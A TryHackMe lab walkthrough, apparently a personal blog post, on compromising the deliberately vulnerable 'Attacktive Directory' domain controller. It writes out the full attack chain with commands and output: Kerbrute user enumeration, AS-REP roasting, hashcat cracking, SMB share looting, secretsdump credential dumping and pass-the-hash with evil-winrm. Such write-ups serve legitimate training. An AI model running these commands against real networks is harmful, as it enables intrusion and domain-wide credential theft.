Attacktive Directory - TryHackMe Walkthrough

Attacktive Directory - “99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller?” This is a TryHackMe box. To access this you must sign up to https://tryhackme.com/.

URL: Year of the Rabbit

Difficulty: Medium

Author: Sq00ky

Enumeration

We are given the IP 10.10.62.162. Run an nmap scan with the following command:

nmap -p- -A -o portscan 10.10.113.38

Here are the open ports:

PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-06-16 15:45:01Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: THM-AD
|   NetBIOS_Domain_Name: THM-AD
|   NetBIOS_Computer_Name: ATTACKTIVEDIREC
|   DNS_Domain_Name: spookysec.local
|   DNS_Computer_Name: AttacktiveDirectory.spookysec.local
|   Product_Version: 10.0.17763
|_  System_Time: 2020-06-16T15:47:30+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2020-04-03T18:40:09
|_Not valid after:  2020-10-03T18:40:09
|_ssl-date: 2020-06-16T15:47:44+00:00; +2s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49688/tcp open  msrpc         Microsoft Windows RPC
49696/tcp open  msrpc         Microsoft Windows RPC
49793/tcp open  msrpc         Microsoft Windows RPC

Let’s visit port 80:

port 80

The image on this page is a link to the following website:

https://www.iis.net/?utm_medium=iis-deployment

We already know this box will be based around Internet Information Services (IIS).

A lot of ports open which seem to all point towards an Active Directory environment.

We can see Kerberos running on port 88 which is an authentication protocol. This is currently the default authentication technology used by Microsoft to authenticate users to services within a local area network.

Port 445 is also open which indicates a service called the server message block (SMB) over TCP/IP.

Whenever ports 139 and 445 are open, I always start by using enum4linux to enumerate.

enum4linux -A 10.10.113.38

enum4linux

We’ve identified the domain name:

Domain Name: THM-AD

I will be installing a tool called Kerbrute. This essentially bruteforces and enumerates valid Active Directory accounts through Kerberos Pre-Authentication, since enum4linux failed to get us any valid credentials.

Kerbrute - Github

Let’s install this tool on the local machine with golang

The challenge provides us with username and password wordlists, let’s download them both onto our local machine:

wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt

Now we can attempt to enumerate the user’s using a brute-force approach with kerberos:

cd ~/go/bin
./kerbrute userenum --dc 10.10.156.50 -d 10.10.156.50 ../../TryHackMe/Attacktive_Directory/userlist.txt -t 100

errors

As you can see, I got a lot of errors when running this command (I like to include errors and mistakes to illustrate how I approach problems).

The error said “KDC ERROR - Wrong Realm. Try adjusting the domain? Aborting…”. Look back a few steps to the nmap scan and we see the domain name as “spookysec.local”:

nmap

Let’s put this in our /etc/hosts file, since we are practicing on a local network:

echo "10.10.62.162 spookysec.local" >> /etc/hosts

Now we can re-attempt the kerbrute brute force:

./kerbrute userenum --dc spookysec.local -d spookysec.local ../../TryHackMe/Attacktive_Directory/userlist.txt -t 100

After a few minutes, we have a list of usernames:

kerbrute results

2020/06/17 05:04:43 >  Using KDC(s):
2020/06/17 05:04:43 >   spookysec.local:88

2020/06/17 05:51:27 >  [+] VALID USERNAME:       [email protected]
2020/06/17 05:51:28 >  [+] VALID USERNAME:       [email protected]
2020/06/17 05:51:28 >  [+] VALID USERNAME:       [email protected]
2020/06/17 05:51:28 >  [+] VALID USERNAME:       [email protected]
2020/06/17 05:51:28 >  [+] VALID USERNAME:       [email protected]
2020/06/17 05:51:29 >  [+] VALID USERNAME:       [email protected]
2020/06/17 05:51:29 >  [+] VALID USERNAME:       [email protected]
2020/06/17 05:51:29 >  [+] VALID USERNAME:       [email protected]
2020/06/17 05:51:35 >  [+] VALID USERNAME:       [email protected]
2020/06/17 05:51:36 >  [+] VALID USERNAME:       [email protected]
2020/06/17 05:51:40 >  [+] VALID USERNAME:       [email protected]
2020/06/17 05:51:48 >  [+] VALID USERNAME:       [email protected]
2020/06/17 05:51:51 >  [+] VALID USERNAME:       [email protected]
2020/06/17 05:52:02 >  [+] VALID USERNAME:       [email protected]
2020/06/17 05:52:04 >  [+] VALID USERNAME:       [email protected]
2020/06/17 05:52:09 >  [+] VALID USERNAME:       [email protected]

The svc-admin (maybe a service admin account?) and Administrator users look interesting. It’s usually wise to disable the administrator account on a network, but they haven’t here.

Exploiting Kerberos

We now want to crack Active Directory passwords with AS-REP Roasting. This is an attack against Kerberos for user accounts that do not require preauthentication. This attack is explained nicely on this article:

Roasting AS-REPs

Pre-authentication is the first step in Kerberos authentication, and is designed to prevent brute-force password guessing attacks.

Although it’s unlikely accounts are ever set up without pre-authentication, it is always possible to find these vulnerable users.

Here is a snapshot of ‘poorly’ configured Kerberos, where pre-authentication has been turned off.

kerboros config

I will be using GetNPUsers.py to retrieve a kerberos ticket (TGT), and attempt to decrypt it. This may pre-installed on your machine, you can find the path with this command:

find / -type f -name 'GetNPUsers.py'

If not, here is a link to the script:

GetNPUsers.py - guthub

This is a great youtube video I used to understand this script:

GetNPUsers & Kerberos Pre-Auth Explained - Youtube

Let’s try this out with the two interesting users we validated earlier:

Administrator:

python GetNPUsers.py spookysec.local/Administrator

GetNPUsers admin

This user doesn’t seem vulnerable, or it is disabled, as we mentioned before.

svc-admin:

python GetNPUsers.py spookysec.local/svc-admin

GetNPUsers

Great, we have the following result:

[email protected]:c2a[REMOVED]e19

Let’s save this to a file called “hash.txt”.

This is a hash value we can attempt to crack using the wordlist they provided in the challenge. I will be using hashcat.

hashcat -m 18200 hash.txt passwordlist.txt --force

“-m 18200” specifies the “mode” we want to use. Use the Hashcat Wiki to read all the different modes when cracking hash values:

Hashcat Wiki

hashcat wiki

Running the hashcat command gives us a password.

hashcat result

Enumerating the Domain Controller

We have some credentials, we have more access within the domain. We want to map the remote SMB shares with smbclient.

smbclient -L spookysec.local --user svc-admin

smbclient map shares

Result:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        backup          Disk      
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 

The share “backup” seems interesting. Let’s explore this.

smbclient \\\\spookysec.local\\backup --user svc-admin
ls

ls smbclient

There is a file called “backup_credentials.txt”, this could be the credentials to another user we identified earlier. Transfer this to your local machine.

get backup_credentials.txt

This looks like it has been encrypted. I used cyberchef to identify and decrypt the hash value:

CyberChef

Cyber Chef Base64 Decode

[email protected]:b***********0

Elevating Privileges

Now that we have new user account credentials, we may have more privileges on the system than before. The username of the account “backup” gets us thinking. What is this the backup account to?

“Well, it is the backup account for the Domain Controller. This account has a unique permission that allows all Active Directory changes to be synced with this user account. This includes password hashes.

Knowing this, we can use another tool within Impacket called “secretsdump.py”. This will allow us to retrieve all of the password hashes that this user account (that is synced with the domain controller) has to offer. Exploiting this, we will effectively have full control over the AD Domain.”

^ Taken from the challenge.

We can now attempt to enumerate additional user information, hopefully with NTLM hashes. So let’s use secretdump.py to do this.

Here is a link to the secretdump.py script:

secretdump.py - Github

If you followed the impacket installation steps on TryHackMe, the python file will be located here:

/opt/impacket/examples
secretsdump.py -just-dc [email protected]

results

We now have a dump of the DC hashes, including the Administrator password hash, guess it hasn’t been disabled :)

Administrator:500:aad3b435b51404eeaad3b435b51404ee:e******************************b:::

We can now either decrypt the NTLM hash and connect as Administrator, or use evil-winrm.

WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.

evil-winrm -i 10.10.156.50 -u Administrator -H e******************************b

evil winrm

Now we are logged in as the Administrator. Each flag is located in the user’s Desktop directory.

Written on June 16, 2020